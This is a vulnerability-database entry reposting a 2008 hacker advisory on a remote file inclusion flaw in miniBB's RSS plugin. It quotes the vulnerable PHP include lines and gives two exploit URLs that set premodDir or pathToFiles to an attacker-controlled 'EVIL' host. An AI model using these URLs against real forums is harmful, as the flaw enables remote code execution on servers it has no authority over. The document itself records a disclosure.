plugin Rss Remote File Inclusion Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052622 漏洞类型
发布时间 2008-07-29 更新时间 2008-07-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008070055
|漏洞详情
漏洞细节尚未披露
|漏洞EXP

##################################################################################################
plugin Rss Remote File Inclusion Vulnerability
Ghost Hacker, http://gh0st10.wordpress.com
 |,  .-.  .-.  ,|
 | )(_o/  \o_)( | R-H team
 |/     /\     \|
##################################################################################################
 [~] Found by : Ghost Hacker
 [~] HomePage : real-hack.net
 [~] Email : Ghost-r00t_at_Hotmail.com
 [~] Name Script : plugin Rss
 [~] Download Script : http://www.minibb.com/download.php?file=minibb_plugin_rss
##################################################################################################
 [~] Error :
include ($pathToFiles.'setup_mysql.php');
include ($pathToFiles.'bb_functions.php');
include($premodDir.'premoder_posts.php');
include($premodDir.'premoder_topics.php');
 [~] Exploit :
http://xxxx/rss.php?premodDir=EVIL
http://xxxx/rss.php?pathToFiles=EVIL
##################################################################################################
 [~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & L&J Team & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope
All Members Real Hack And All My Friends ..
##################################################################################################
Found by : Ghost Hacker [ R-H TeaM ]
##################################################################################################

hi str0ke 
HomePage plugin Rss http://www.minibb.com
s33 y0u :) ,